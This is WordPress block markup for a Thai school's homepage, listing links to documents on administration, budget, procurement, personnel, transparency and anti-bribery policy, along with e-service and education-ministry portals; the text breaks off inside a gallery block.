{\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%a